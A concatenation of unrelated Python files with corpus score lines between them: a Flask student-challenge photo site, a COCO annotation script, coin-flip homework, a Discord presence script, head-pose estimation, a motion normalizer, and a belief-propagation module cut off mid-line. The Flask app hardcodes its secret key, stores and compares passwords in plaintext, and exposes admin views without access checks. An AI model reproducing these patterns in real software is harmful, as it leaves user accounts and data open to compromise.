Used the code from chapter 5a from the book "Flask Web Development: Developing Web Applications
by <NAME> as a base for this project
'''
import os
from flask import Flask, request, render_template, redirect, url_for, flash, send_from_directory, session
from flask.ext.script import Manager
from flask.ext.bootstrap import Bootstrap
from flask.ext.moment import Moment
from flask.ext.sqlalchemy import SQLAlchemy
from werkzeug import secure_filename
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
from flask_login import LoginManager, login_required
from flask.ext.wtf import Form
from wtforms import StringField, PasswordField, BooleanField, SubmitField, SelectField, validators, TextField
from wtforms.validators import Required
#from app.main.forms import RegistrationForm
import app.main.forms
basedir = os.path.abspath(os.path.dirname(__file__))
UPLOAD_FOLDER = os.path.join(basedir, 'static/pics')
ALLOWED_EXTENSIONS = set(['png', 'jpg'])
app = Flask(__name__)
app.config['SECRET_KEY'] = 'hard to guess string'
app.config['SQLALCHEMY_DATABASE_URI'] = \
'sqlite:///' + os.path.join(basedir, 'TraditionsChallenge.sqlite')
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
manager = Manager(app)
bootstrap = Bootstrap(app)
moment = Moment(app)
db = SQLAlchemy(app)
admin = Admin(app)
class User(db.Model):
__tablename__ = 'User'
id = db.Column(db.Integer, primary_key=True)
role = db.Column(db.String(64))
username = db.Column(db.String(64), unique=True, index=True)
password = db.Column(db.String(64), index=True)
firstName = db.Column(db.String(64), index=True)
lastName = db.Column(db.String(64), index=True)
classYear = db.Column(db.Integer)
major = db.Column(db.String(64), index=True)
email = db.Column(db.String(64), unique=True, index=True)
idNumber = db.Column(db.Integer, unique=True)
private = db.Column(db.Integer)
numComplete = db.Column(db.Integer)
def check_password(self, password):
match=False
if password == self.password:
match=True
return match
def is_authenticated(self):
return True
class Challenge(db.Model):
__tablename__ = 'Challenge'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128), unique=True, index=True)
class UserToChallenge(db.Model):
__tablename__ = 'UserToChallenge'
id = db.Column(db.Integer, primary_key=True)
status = db.Column(db.Integer)
#changed below line to db.String
photo = db.Column(db.String)
description = db.Column(db.String(128), index=True)
userid = db.Column(db.Integer, db.ForeignKey('User.id'))
challengeid = db.Column(db.Integer, db.ForeignKey('Challenge.id'))
class Prize(db.Model):
__tablename__ = 'Prize'
id = db.Column(db.Integer, primary_key=True)
prizeName = db.Column(db.String(64), unique=True, index=True)
numChallengesNeeded = db.Column(db.Integer)
class UserToPrize(db.Model):
__tablename__ = 'UserToPrize'
id = db.Column(db.Integer, primary_key=True)
status = db.Column(db.Integer)
userid = db.Column(db.Integer, db.ForeignKey('User.id'))
prizeid = db.Column(db.Integer, db.ForeignKey('Prize.id'))
@app.errorhandler(404)
def page_not_found(e):
print (e)
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
@app.route('/', methods=['GET', 'POST'])
def ictraditions():
challengeList = []
for a in Challenge.query.order_by('id'):
challengeList.append(a.name)
return render_template('ictraditions.html', challengeList=challengeList)
def checkForLogin():
isIn = False
if 'isLoggedIn' in session and session['isLoggedIn'] == True:
isIn = True
return isIn
def checkForAdminLogin():
isAdminIn = False
if 'isAdminLoggedIn' in session and session['isAdminLoggedIn'] == True:
isAdminIn = True
return isAdminIn
@app.route('/home.html', methods=['GET', 'POST'])
#@login_required
def home():
challengeList = []
user1 = User.query.filter_by(id=session['user_id']).first()
numComplete = user1.numComplete
for a in Challenge.query.order_by('id'):
challengeList.append(a.name)
if request.method == 'POST':
file = request.files['file']
##########
desc = request.form['description']
challenge = request.form['challenge']
if file and allowed_file(file.filename):
filename = file.filename
#this changes the filename to the username followed by the challenge number
type = filename[-4:]
currentUserId = session['user_id']
currUser = User.query.filter_by(id = currentUserId).first()
newName = currUser.username + str(challenge) + type
file.save(os.path.join(app.config['UPLOAD_FOLDER'], newName))
userToChallenge = UserToChallenge(status = 0,
photo = newName,
description = desc,
userid = currentUserId,
challengeid = challenge)
db.session.add(userToChallenge)
db.session.commit()
flash('Your photo has been uploaded successfully.')
#return redirect(url_for('uploaded_file',filename=filename))
else:
flash('Not a valid file type. Only jpg and png allowed.')
statusList=[-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]
for a in UserToChallenge.query.filter_by(userid = session['user_id']):
statusList[a.challengeid-1]=a.status
isIn=checkForLogin()
return render_template('home.html', challengeList = challengeList, isLoggedIn=isIn, numComplete=numComplete, statusList=statusList)
@app.route('/register.html', methods=['GET', 'POST'])
def register():
from app.main.forms import RegistrationForm
form = RegistrationForm()
if form.validate_on_submit():
user = User(role='Student',
email=form.email.data,
username=form.username.data,
password=<PASSWORD>,
idNumber=form.idNumber.data,
private=form.private.data,
firstName = form.firstName.data,
lastName = form.lastName.data,
classYear = form.classYear.data,
major = form.major.data,
numComplete = 0)
db.session.add(user)
db.session.commit()
flash('Your account has been created. You may now login!')
challengeList=[]
for a in Challenge.query.order_by('id'):
challengeList.append(a.name)
return render_template('ictraditions.html', challengeList=challengeList)
return render_template('register.html', form=form)
@app.route('/community.html', methods=['GET', 'POST'])
def community():
challengeList=[]
for a in Challenge.query.order_by('id'):
challengeList.append(a.name)
#PICTURE GRID
isIn=checkForLogin()
isAdminIn = checkForAdminLogin()
print("isIn")
print(isIn)
print("isAdminIn")
print(isAdminIn)
if isIn or isAdminIn:
loggedIn = True
userList = []
userNameList = []
photoList = []
descriptionList = []
tempList = []
tempUserList = []
tempChallList = []
challengePicList = []
#queries the databse for all users who allow pics to be public
for a in User.query.filter_by(private = 2):
userList.append(a.id)
#queries database for all userids
for a in UserToChallenge.query.order_by('userid'):
#if a UserToChallenge entry has a public user then append the photo, description to approproate lists
if a.userid in userList:
photoList.append(a.photo)
descriptionList.append(a.description)
tempUserList.append(a.userid)
tempChallList.append(a.challengeid)
for b in tempUserList:
for c in User.query.filter_by(id=b):
userNameList.append(c.username)
for d in tempChallList:
for e in Challenge.query.filter_by(id=d):
challengePicList.append(e.name)
#photoList, descriptionList, userNameList, challengePicList = getAllPhotos()
print(userNameList)
print(challengePicList)
photoListSearch = []
descriptionListSearch = []
userNameListSearch = []
challengePicListSearch=[]
if request.method == 'POST':
buttonType = request.form['submit']
userToSearchBy = request.form['text']
challenge = request.form['challenge']
if buttonType == "Clear Search":
photoList = []
descriptionList = []
#photoList, descriptionList, userNameList, challengePicList = getAllPhotos()
for a in User.query.filter_by(private = 2):
userList.append(a.id)
#userNameList.append(a.username)
for a in UserToChallenge.query.order_by('userid'):
if a.userid in userList:
photoList.append(a.photo)
descriptionList.append(a.description)
tempList.append(a.userid)
for b in tempList:
for c in User.query.filter_by(id=b):
userNameList.append(c.username)
return render_template('community.html', isLoggedIn=loggedIn, isAdminLoggedIn=isAdminIn, userNameList=userNameList, photoList=photoList, descriptionList=descriptionList, challengeList=challengeList, challengePicList=challengePicList)
elif buttonType =="Submit":
photoListSearch, descriptionListSearch, userNameListSearch, challengePicListSearch = searchByChallenge(challenge)
if (photoListSearch == []):
flash("No public images for this challenge")
return render_template('community.html', isLoggedIn=loggedIn, isAdminLoggedIn=isAdminIn, userNameList=userNameListSearch, photoList=photoListSearch, descriptionList=descriptionListSearch, challengeList=challengeList, challengePicList=challengePicListSearch)
else:
photoListSearch, descriptionListSearch, userNameListSearch, challengePicListSearch = searchByName(userToSearchBy)
if (photoListSearch == []):
flash("No public images for this user")
return render_template('community.html', isLoggedIn=loggedIn,isAdminLoggedIn=isAdminIn, userNameList=userNameListSearch, photoList=photoListSearch, descriptionList=descriptionListSearch, challengeList=challengeList, challengePicList=challengePicListSearch)
return render_template('community.html', isLoggedIn=loggedIn, isAdminLoggedIn=isAdminIn, userNameList=userNameList, photoList=photoList, descriptionList=descriptionList, challengeList=challengeList, challengePicList=challengePicList)
def searchByName(searchTerm):
userListSearch = []
photoListSearch = []
descriptionListSearch = []
userNameListSearch = []
tempUserList=[]
tempChallList=[]
challengePicListSearch = []
for a in User.query.filter_by(username = searchTerm):
if a.private ==2:
userListSearch.append(a.id)
for a in UserToChallenge.query.order_by('userid'):
if a.userid in userListSearch:
photoListSearch.append(a.photo)
descriptionListSearch.append(a.description)
tempUserList.append(a.userid)
tempChallList.append(a.challengeid)
for b in tempUserList:
for c in User.query.filter_by(id=b):
userNameListSearch.append(c.username)
for d in tempChallList:
for e in Challenge.query.filter_by(id=d):
challengePicListSearch.append(e.name)
return (photoListSearch, descriptionListSearch, userNameListSearch, challengePicListSearch)
def searchByChallenge(searchTerm):
print(searchTerm)
userListSearch = []
photoListSearch = []
descriptionListSearch = []
userNameListSearch = []
tempUserList=[]
tempChallList=[]
challengePicListSearch=[]
for a in User.query.filter_by(private = 2):
userListSearch.append(a.id)
for a in UserToChallenge.query.filter_by(challengeid = searchTerm):
if a.userid in userListSearch:
photoListSearch.append(a.photo)
descriptionListSearch.append(a.description)
tempUserList.append(a.userid)
tempChallList.append(a.challengeid)
for b in tempUserList:
for c in User.query.filter_by(id=b):
userNameListSearch.append(c.username)
for d in tempChallList:
for e in Challenge.query.filter_by(id=d):
challengePicListSearch.append(e.name)
print('test')
print(tempChallList)
print(challengePicListSearch)
return (photoListSearch, descriptionListSearch, userNameListSearch, challengePicListSearch)
@app.route('/calendar.html', methods=['GET', 'POST'])
def calendar():
isIn=checkForLogin()
isAdminIn = checkForAdminLogin()
if isIn or isAdminIn:
loggedIn = True
return render_template('calendar.html', isLoggedIn=loggedIn, isAdminLoggedIn=isAdminIn)
class ChangePrivacyForm(Form):
newPrivate = SelectField('Would you like to change the privacy setting of your photos?', validators=[Required()],
coerce=int, choices=[(1, "Private"), (2, "Public")])
submit = SubmitField('Update')
@app.route('/settings.html', methods=['GET', 'POST'])
def settings():
form = ChangePrivacyForm()
if form.validate_on_submit():
currentUserId = session['user_id']
for a in User.query.filter_by(id = currentUserId):
a.private = form.newPrivate.data
flash('Your privacy settings have been updated.')
isIn=checkForLogin()
return redirect(url_for('settings'))
#return redirect('settings.html',isLoggedIn=isIn, form=form)
isIn=checkForLogin()
return render_template('settings.html', isLoggedIn=isIn, form=form)
@app.route('/prizeReview.html', methods=['GET', 'POST'])
def prizeReview():
#the .order_by('role') is sort of cheating.. i don't know how to use order_by or filter_by correctly
#it's displaying the usernames right now, if we want first+last names, we have to change something
prize1List = []
for a in User.query.order_by('role'):
if 5 <= a.numComplete:
prize1List.append(a.username)
prize2List = []
for a in User.query.order_by('role'):
if 10 <= a.numComplete:
prize2List.append(a.username)
prize3List = []
for a in User.query.order_by('role'):
if 15 <= a.numComplete:
prize3List.append(a.username)
isAdminIn = checkForAdminLogin()
return render_template('prizeReview.html', prize1List=prize1List, prize2List=prize2List, prize3List=prize3List, isAdminLoggedIn=isAdminIn)
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
@app.route('/uploads/<filename>')
def uploaded_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
#LOGIN
class LoginForm(Form):
username = TextField('Username', [validators.Required()])
password = PasswordField('Password', [validators.Required()])
submit = SubmitField('Login')
def __init__(self, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
self.user = None
def validate(self):
rv = Form.validate(self)
if not rv:
return False
user = User.query.filter_by(username=self.username.data).first()
if user is None:
self.username.errors.append('Unknown username')
return False
if not user.check_password(self.password.data):
self.password.errors.append('Invalid password')
return False
self.user = user
return True
login_manager = LoginManager()
login_manager.init_app(app)
@login_manager.user_loader
def load_user(id):
return User.id
@app.route('/login.html', methods=['GET', 'POST'])
def login():
session['isLoggedIn'] = False
session['isAdminLoggedIn'] = False
form = LoginForm()
if form.validate_on_submit():
session['user_id'] = form.user.id
for a in User.query.filter_by(username=form.user.username):
if a.role == 'Student':
session['isLoggedIn'] = True
return redirect(url_for('home'))
if a.role == 'Admin':
session['isAdminLoggedIn'] = True
return redirect(url_for('adminHome'))
return render_template('login.html', form=form)
@app.route('/logout.html')
def logout():
session['isLoggedIn'] = False
session['isAdminLoggedIn'] = False
return render_template('ictraditions.html')
#ADMIN
admin.add_view(ModelView(User, db.session))
admin.add_view(ModelView(Challenge, db.session))
admin.add_view(ModelView(UserToChallenge, db.session))
admin.add_view(ModelView(Prize, db.session))
admin.add_view(ModelView(UserToPrize, db.session))
@app.route('/admin/index')
def admin():
return render_template('admin/index.html')
@app.route('/adminHome.html', methods=['GET', 'POST'])
def adminHome():
isAdminIn = checkForAdminLogin()
#photoList will be the photos that are pending that the admin needs to approve
photoList = []
descriptionList=[]
challengeNameList=[]
userNameList=[]
for a in UserToChallenge.query.order_by('status'):
if a.status == 0:
photoList.append(a.photo)
descriptionList.append(a.description)
userNameList.append(User.query.filter_by(id=a.userid).first().username)
challengeNameList.append(Challenge.query.filter_by(id=a.challengeid).first().name)
if request.method == 'POST':
if request.form['submit']:
buttonString = request.form['submit']
approveOrDeny = buttonString.split(":")[0]
if(approveOrDeny == "Approve"):
photoName = buttonString.split(" ")[1]
for a in UserToChallenge.query.filter_by(photo=photoName):
if a.photo == photoName:
a.status = 1
for b in User.query.filter_by(id = a.userid):
b.numComplete = b.numComplete +1
db.session.commit()
index = photoList.index(a.photo)
photoList.remove(a.photo)
userNameList.remove(userNameList[index])
descriptionList.remove(descriptionList[index])
challengeNameList.remove(challengeNameList[index])
return render_template('adminHome.html', isAdminLoggedIn=isAdminIn, photoList = photoList, userNameList=userNameList, challengeNameList=challengeNameList, descriptionList=descriptionList)
elif(approveOrDeny == "Deny"):
photoLong = request.form['submit']
photoName = photoLong.split(" ")[1]
for a in UserToChallenge.query.filter_by(photo=photoName):
if a.photo == photoName:
a.status = 2
db.session.commit()
index = photoList.index(a.photo)
print(descriptionList)
photoList.remove(a.photo)
userNameList.remove(userNameList[index])
descriptionList.remove(descriptionList[index])
challengeNameList.remove(challengeNameList[index])
print(descriptionList)
return render_template('adminHome.html', isAdminLoggedIn=isAdminIn, photoList = photoList, userNameList=userNameList, challengeNameList=challengeNameList, descriptionList=descriptionList)
else:
print("error")
return render_template('adminHome.html', isAdminLoggedIn=isAdminIn, photoList = photoList, userNameList=userNameList, challengeNameList=challengeNameList, descriptionList=descriptionList)
if __name__ == '__main__':
db.create_all()
manager.run()
| 2.46875 | 2 |
prepro/create_json_file.py | giangnguyen2412/dissect_catastrophic_forgetting | 2 | 12760302 | <filename>prepro/create_json_file.py
import os
import json
import argparse
from pick_image import make_dir
def create_class_annotations(test_dir, json_file, output_dir, class_name):
"""
Create annotation files for each class in test set, set is created from val
so image name will be like in validation set
:param test_dir:
:param json_file:
:param output_dir:
:param class_name: category name e.g dog, cat ...
:return:
"""
input_img_path = test_dir + class_name + '/'
input_json_file = json_file
output_dir = input_img_path
output_path = output_dir + 'captions_test.json'
image_subdirs = [x[2] for x in os.walk(input_img_path)]
with open(input_json_file) as json_file:
data = json.load(json_file)
class_json = dict()
class_json['info'] = data['info']
class_json['licenses'] = data['licenses']
class_json['images'] = []
class_json['annotations'] = []
class_json['type'] = 'captions' # Add this to adapt with coco-eval
for image in data['images']:
if image['file_name'] in image_subdirs[0]:
class_json['images'].append(image)
for annotation in data['annotations']:
image_id = annotation['image_id']
file_name = ('COCO_%s2014_%012d.jpg' % ('val', image_id))
if file_name in image_subdirs[0]:
class_json['annotations'].append(annotation)
print("Finishing build JSON object to dump to {}".format(output_path))
with open(output_path, 'w') as file:
json.dump(class_json, file)
def create_annotations(image_dir, json_file, output_dir, t_type, name):
"""
Create annotation for a task
:param image_dir:
:param json_file:
:param output_dir:
:param t_type:
:param name:
:return:
"""
image_subdirs = [x[2] for x in os.walk(image_dir + '/' + name + '/' + t_type + '/')]
if t_type == 'train':
input_path = json_file + '/captions_train2014.json'
else:
input_path = json_file + '/captions_val2014.json'
make_dir(output_dir)
output_path = output_dir + '/' + name
make_dir(output_path)
output_path += '/captions_%s.json' % (t_type)
if t_type == 'test':
t_type = 'val'
with open(input_path) as json_file:
data = json.load(json_file)
split_json = dict()
split_json['info'] = data['info']
split_json['licenses'] = data['licenses']
split_json['images'] = []
split_json['annotations'] = []
split_json['type'] = 'captions' # Add this to adapt with coco-eval
for image in data['images']:
if image['file_name'] in image_subdirs[0]:
split_json['images'].append(image)
for annotation in data['annotations']:
image_id = annotation['image_id']
file_name = ('COCO_%s2014_%012d.jpg' % (t_type, image_id))
if file_name in image_subdirs[0]:
split_json['annotations'].append(annotation)
print("Finishing build JSON object to dump to {}".format(output_path))
with open(output_path, 'w') as file:
json.dump(split_json, file)
def main(args):
image_dir = args.image_dir
json_file = args.json_file
output_dir = args.output_dir
name = args.name
create_annotations(image_dir, json_file, output_dir, 'train', name)
create_annotations(image_dir, json_file, output_dir, 'val', name)
create_annotations(image_dir, json_file, output_dir, 'test', name)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--image_dir', type=str, default='../data/img', help='directory for images')
parser.add_argument('--json_file', type=str, default='../dataset/original/annotations_trainval2014',
help='directory for json files')
parser.add_argument('--output_dir', type=str, default='../data/annotations', help='directory for output json file')
parser.add_argument('--name', type=str, default='base20', help='name of folder')
args = parser.parse_args()
main(args)
| 2.953125 | 3 |
homework/modules/challenge_3.py | xParadoxx/coding-winter-session | 0 | 12760303 | <filename>homework/modules/challenge_3.py
"""
Write a program that plays a simple coin flip game with the user.
NOTE:
" heads" != "heads"
"HEADS" != "heads"
global variables are defined at the import level; they are always in all caps, and represent constant, unchanging
values
"""
from random import randint
HEADS = "heads"
TAILS = "tails"
def get_user_move():
move = input(f"{HEADS} or {TAILS}? ")
return move.strip().lower()
def coin_flip():
# 1 --> heads, 2 --> tails
move_value = randint(1, 2)
if move_value == 1:
return HEADS
else:
return TAILS
def main():
user_move = get_user_move()
if user_move != HEADS and user_move != TAILS:
print("that's not a possibility")
return
coin_toss = coin_flip()
print(f"your move was {user_move} and the flip was {coin_toss}")
if user_move == coin_toss:
print("you got it!!")
else:
print("better luck next time")
main()
| 4.25 | 4 |
spinup/replay_buffers/amp_utils/deep_mimic_normalizer.py | florianHoidn/spinningup | 0 | 12760304 | <reponame>florianHoidn/spinningup<filename>spinup/replay_buffers/amp_utils/deep_mimic_normalizer.py
import numpy as np
class DeepMimicStyleNormalizer():
"""
This normalizer is more or less a copy of DeepMimic's Normalizer and is meant for internal use by the
AMP discriminator in an AMPReplayBuffer.
"""
NORM_GROUP_SINGLE = 0
NORM_GROUP_NONE = -1
class Group(object):
def __init__(self, id, indices):
self.id = id
self.indices = indices
def __init__(self, size, groups_ids=None, eps=0.02, clip=np.inf):
self.eps = eps
self.clip = clip
self.mean = np.zeros(size)
self.mean_sq = np.zeros(size)
self.std = np.ones(size)
self.count = 0
self.groups = self._build_groups(groups_ids)
self.new_count = 0
self.new_sum = np.zeros_like(self.mean)
self.new_sum_sq = np.zeros_like(self.mean_sq)
def record(self, x):
size = self.get_size()
if size <= 0:
return
is_array = isinstance(x, np.ndarray)
if not is_array:
x = np.array([[x]])
x = np.reshape(x, [-1, size])
self.new_count += x.shape[0]
self.new_sum += np.sum(x, axis=0)
self.new_sum_sq += np.sum(np.square(x), axis=0)
def update(self):
new_count = np.sum(self.new_count)
new_sum = np.sum(self.new_sum)
new_sum_sq = np.sum(self.new_sum_sq)
new_total = self.count + new_count
if new_count > 0:
new_mean = self._process_group_data(new_sum / new_count, self.mean)
new_mean_sq = self._process_group_data(new_sum_sq / new_count, self.mean_sq)
w_old = float(self.count) / new_total
w_new = float(new_count) / new_total
self.mean = w_old * self.mean + w_new * new_mean
self.mean_sq = w_old * self.mean_sq + w_new * new_mean_sq
self.count = new_total
self.std = self.calc_std(self.mean, self.mean_sq)
self.new_count = 0
self.new_sum.fill(0)
self.new_sum_sq.fill(0)
def get_size(self):
return self.mean.size
def set_mean_std(self, mean, std):
size = self.get_size()
is_array = isinstance(mean, np.ndarray) and isinstance(std, np.ndarray)
if not is_array:
mean = np.array([mean])
std = np.array([std])
self.mean = mean
self.std = std
self.mean_sq = self.calc_mean_sq(self.mean, self.std)
def normalize(self, x):
norm_x = (x - self.mean) / self.std
norm_x = np.clip(norm_x, -self.clip, self.clip)
return norm_x
def unnormalize(self, norm_x):
x = norm_x * self.std + self.mean
return x
def calc_std(self, mean, mean_sq):
var = mean_sq - np.square(mean)
# some time floating point errors can lead to small negative numbers
var = np.maximum(var, 0)
std = np.sqrt(var)
std = np.maximum(std, self.eps)
return std
def calc_mean_sq(self, mean, std):
return np.square(std) + np.square(self.mean)
def _build_groups(self, groups_ids):
groups = []
if groups_ids is None:
curr_id = self.NORM_GROUP_SINGLE
curr_list = np.arange(self.get_size()).astype(np.int32)
groups.append(self.Group(curr_id, curr_list))
else:
ids = np.unique(groups_ids)
for id in ids:
curr_list = np.nonzero(groups_ids == id)[0].astype(np.int32)
groups.append(self.Group(id, curr_list))
return groups
def _process_group_data(self, new_data, old_data):
proc_data = new_data.copy()
for group in self.groups:
if group.id == self.NORM_GROUP_NONE:
proc_data[group.indices] = old_data[group.indices]
elif group.id != self.NORM_GROUP_SINGLE:
avg = np.mean(new_data[group.indices])
proc_data[group.indices] = avg
return proc_data | 2.25 | 2 |
rpc.py | pcislocked/adobe-rpc | 0 | 12760305 | from pypresence import Presence
import handler
import time
client_id = "807964106673225748"
rich_presence = Presence(client_id)
def connect():
return rich_presence.connect()
def connect_loop(retries=0):
if retries > 10:
return
try:
connect()
except:
print("Where is Discord?")
time.sleep(10)
retries += 1
connect_loop(retries)
else:
update_loop()
print("Started Adobe RPC - pcislocked edited")
def update_loop():
start_time = int(time.time())
try:
while True:
rpc_data = handler.get_rpc_update()
rich_presence.update(state=rpc_data['state'],
small_image=rpc_data['small_image'],
large_image=rpc_data['large_image'],
large_text=rpc_data['large_text'],
small_text="pcislocked's AdobeRPC",
details=rpc_data['details'],
start=rpc_data['create_time'])
time.sleep(15) #Reason: https://discord.com/developers/docs/rich-presence/how-to#updating-presence
except:
rich_presence.clear()
print("Exception: I can't find Adobe(maybe?)")
time.sleep(2)
update_loop()
try:
connect_loop()
except KeyboardInterrupt:
print("Adobe RPC is gone 🦀")
quit()
| 2.75 | 3 |
face_pose_dataset/estimation/base/fsanet.py | samuelbaltanas/face-pose-dataset | 1 | 12760306 | <reponame>samuelbaltanas/face-pose-dataset
import logging
import os
from typing import Tuple
import cv2
import numpy as np
import pkg_resources
import tensorflow.compat.v1 as tf
from tensorflow.keras.layers import Average
import face_pose_dataset as fpdata
from face_pose_dataset import core
from face_pose_dataset.estimation import interface, mtcnn
from face_pose_dataset.third_party.fsa_estimator import FSANET_model
# tf.disable_v2_behavior()
__all__ = ["FSAEstimator", "SSDDetector"]
class SSDDetector:
def __init__(self):
# load our serialized face detector from disk
logging.debug("Loading face detector.")
proto_path = os.path.join(
fpdata.PROJECT_ROOT, "data", "face_detector", "deploy.prototxt"
)
model_path = os.path.join(
fpdata.PROJECT_ROOT,
"data",
"face_detector",
"res10_300x300_ssd_iter_140000.caffemodel",
)
logging.debug("Face detector loaded.")
self.net = cv2.dnn.readNetFromCaffe(proto_path, model_path)
def run(self, input_img: np.ndarray, threshold=0.8) -> np.ndarray:
blob = cv2.dnn.blobFromImage(
cv2.resize(input_img, (300, 300)), 1.0, (300, 300), (104.0, 177.0, 123.0),
)
self.net.setInput(blob)
detected = self.net.forward()
detected = detected[:, :, detected[0, 0, :, 2] >= threshold, :]
return detected
def extract_faces(
input_image: np.ndarray,
detection: np.ndarray,
shape: Tuple[int, int] = (300, 300),
threshold: float = 0.8,
margin: float = 0.6,
normalize: bool = False,
):
""" Extract detections from image. """
faces = None
if detection.shape[2] > 0:
faces = np.empty((detection.shape[2], *shape, 3), dtype=np.int)
(h0, w0) = input_image.shape[:2]
detection[0, 0, :, 3:7] *= np.array([w0, h0, w0, h0])
if margin > 0:
w = detection[0, 0, :, 5] - detection[0, 0, :, 3]
h = detection[0, 0, :, 6] - detection[0, 0, :, 4]
detection[0, 0, :, 3] -= w * margin
detection[0, 0, :, 4] -= h * margin
detection[0, 0, :, 5] += w * margin
detection[0, 0, :, 6] += h * margin
del w, h
detection = detection.astype(np.int)
detection[0, 0, :, 3] = np.clip(detection[0, 0, :, 3], 0, input_image.shape[1])
detection[0, 0, :, 5] = np.clip(detection[0, 0, :, 5], 0, input_image.shape[1])
detection[0, 0, :, 4] = np.clip(detection[0, 0, :, 4], 0, input_image.shape[0])
detection[0, 0, :, 6] = np.clip(detection[0, 0, :, 6], 0, input_image.shape[0])
for idx, val in enumerate(detection[0, 0]):
faces[idx, :, :, :] = cv2.resize(
input_image[val[4] : val[6] + 1, val[3] : val[5] + 1, :], shape,
)
if normalize:
faces[idx, :, :, :] = cv2.normalize(
faces[idx, :, :, :],
None,
alpha=0,
beta=255,
norm_type=cv2.NORM_MINMAX,
)
return faces
class FSAEstimator(interface.Estimator):
def __init__(self, use_gpu=False):
self.img_size = 64, 64
# Parameters
num_capsule = 3
dim_capsule = 16
routings = 2
stage_num = [3, 3, 3]
lambda_d = 1
num_classes = 3
num_primcaps = 7 * 3
m_dim = 5
s_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
gpus_available = tf.config.list_physical_devices(device_type="GPU")
logging.info("[FSANET] GPUs available: %s.", gpus_available)
if gpus_available:
config = tf.ConfigProto(
log_device_placement=False, # logging.getLogger().level < logging.INFO
)
config.gpu_options.allow_growth = True
logging.info("[FSANET] Set on GPU.")
else:
config = tf.ConfigProto(
log_device_placement=False, # logging.getLogger().level < logging.INFO,
device_count={"CPU": 1, "GPU": 0},
)
logging.info("[FSANET] Set on CPU.")
self.session = tf.InteractiveSession(config=config)
tf.compat.v1.keras.backend.set_session(self.session)
self.graph = tf.get_default_graph()
with self.graph.as_default():
model1 = FSANET_model.FSA_net_Capsule(
self.img_size[0], num_classes, stage_num, lambda_d, s_set
)()
model2 = FSANET_model.FSA_net_Var_Capsule(
self.img_size[0], num_classes, stage_num, lambda_d, s_set
)()
num_primcaps = 8 * 8 * 3
s_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model3 = FSANET_model.FSA_net_noS_Capsule(
self.img_size[0], num_classes, stage_num, lambda_d, s_set
)()
logging.info("[FSANET] Loading data ...")
weight_file1 = pkg_resources.resource_filename(
"face_pose_dataset",
"data/FSA_300W_LP_model/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5",
)
model1.load_weights(weight_file1)
logging.info("[FSANET] Model 1 loaded.")
weight_file2 = pkg_resources.resource_filename(
"face_pose_dataset",
"data/FSA_300W_LP_model/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5",
)
model2.load_weights(weight_file2)
logging.info("[FSANET] Model 2 loaded.")
weight_file3 = pkg_resources.resource_filename(
"face_pose_dataset",
"data/FSA_300W_LP_model/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5",
)
model3.load_weights(weight_file3)
logging.info("[FSANET] Model 3 loaded.")
inputs = FSANET_model.Input(shape=(*self.img_size, 3))
x1 = model1(inputs) # 1x1
x2 = model2(inputs) # var
x3 = model3(inputs) # w/o
avg_model = Average()([x1, x2, x3])
self.model = FSANET_model.Model(inputs=inputs, outputs=avg_model)
logging.info("[FSANET] Loaded.")
def preprocess_image(self, frame: np.ndarray, bbox: np.ndarray) -> np.ndarray:
# DONE Test 0.4 margin instead of 0.6
res = mtcnn.extract_face(
frame, (64, 64), bbox, landmark=None, margin=0.6, normalize=True
)
return np.expand_dims(res, 0)
def run(self, input_images: np.ndarray) -> np.ndarray:
with self.graph.as_default():
tf.keras.backend.set_session(self.session)
yaw, pitch, roll = self.model.predict(input_images)[0]
ang = core.Angle(yaw=yaw, pitch=pitch, roll=-roll)
return ang
if __name__ == "__main__":
pass
| 2.484375 | 2 |
src/loopy_modules.py | joennlae/amp | 7 | 12760307 | '''
This file implements the detection algorithms (message passing) on markov random field of graphs generated by ER model.
The algorithms defined in this file would be imported by bin/varying_loopy.py
For the specifics about the algorithms, please see the description in manuscript/amp.pdf.
'''
import numpy as np
import itertools
import factorgraph as fg
import maxsum
import alphaBP
from scipy.stats import multivariate_normal
######################################################################
class ML(object):
def __init__(self, hparam):
self.hparam = hparam
self.constellation = hparam.constellation
pass
def detect(self, S, b):
proposals = list( itertools.product(self.constellation, repeat=self.hparam.num_tx) )
threshold = np.inf
solution = None
for x in proposals:
tmp = np.matmul(np.array(x), S).dot(np.array(x)) + b.dot(x)
if tmp < threshold:
threshold = tmp
solution = x
return solution
class Marginal(object):
"""Compute all the marginals for a given distributions"""
def __init__(self, hparam):
self.hparam = hparam
self.constellation = hparam.constellation
pass
def detect(self, S, b):
proposals = list( itertools.product(self.constellation, repeat=S.shape[0]) )
array_proposals = np.array(proposals)
prob = []
for x in proposals:
tmp = np.matmul(np.array(x), S).dot(np.array(x)) + b.dot(x)
prob.append(np.exp(-tmp))
prob = np.array(prob)
marginals = []
for i in range(b.shape[0]):
this_marginal = []
for code in self.constellation:
subset_idx = array_proposals[:, i]==code
this_marginal.append(np.sum( prob[subset_idx]))
# normalize the marginal
this_marginal = np.array(this_marginal)
this_marginal = this_marginal/this_marginal.sum()
marginals.append( this_marginal)
return np.array(marginals)
class LoopyBP(object):
def __init__(self, noise_var, hparam):
# get the constellation
self.constellation = hparam.constellation
self.hparam = hparam
# set the graph
self.graph = fg.Graph()
# add the discrete random variables to graph
self.n_symbol = hparam.num_tx
for idx in range(hparam.num_tx):
self.graph.rv("x{}".format(idx), len(self.constellation))
def set_potential(self, S, b):
s = S
for var_idx in range(self.hparam.num_tx):
# set the first type of potentials, the standalone potentials
f_x_i = np.exp( - s[var_idx, var_idx] * np.power(self.constellation, 2)
- b[var_idx] * np.array(self.constellation))
